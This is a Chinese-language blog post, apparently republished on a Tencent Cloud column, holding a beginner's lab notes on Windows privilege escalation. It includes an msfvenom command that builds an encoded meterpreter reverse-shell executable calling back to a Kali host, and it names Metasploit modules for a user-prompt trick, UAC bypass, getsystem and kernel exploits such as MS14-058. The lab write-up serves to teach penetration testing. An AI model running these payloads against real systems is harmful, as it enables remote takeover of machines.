首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >初学内网渗透之权限提升

初学内网渗透之权限提升

作者头像
TRY博客-简单的网络技术
发布2022-07-18 14:09:12
发布2022-07-18 14:09:12
5200
举报

关于后渗透的一些权限提升

这是我自己乱记的笔记,大佬们看看就好了。[aru_15]

1.环境准备:

Kali:192.168.137.138

靶机: 192.168.137.129 (win2012) 192.168.137.150 (win2008)

2.木马客户端生成:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.138 LPORT"\x00" -e x86/shikata_ga_nai -f exe > msf.exe  (把生成的文件上传到靶机上,监听会话后运行。)

监听会话:use exploit/multi/handler

payload:windows/meterpreter/reverse_tcp

3.建立会话:

(低权限)

(直接提权失败)

4.Msf模块:(提权操作win2012测试)

Exploit/windows/local/ask      (在已经获取低权限会话时候使用,诱导用户点击执行)

(点击是后就建立新的会话)

获取新的session 4后,进行getsystem进行提升权限,提升到system权限。

(获取高权限)

5.UAC提权模块:(win2008靶机测试)

设置低权限session 3

然后执行,成功返回会话。

6.利用提权漏洞进行提取

1).exploit/windows/local/ms14_058_track_popup_menu (靶机上没该漏洞。)

该漏洞存在的系统:

(执行成功的话,直接返回system权限。)

总结:本地提权漏洞存在很多,可以根据系统多试试。比如ms16_016

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-12-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 关于后渗透的一些权限提升
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档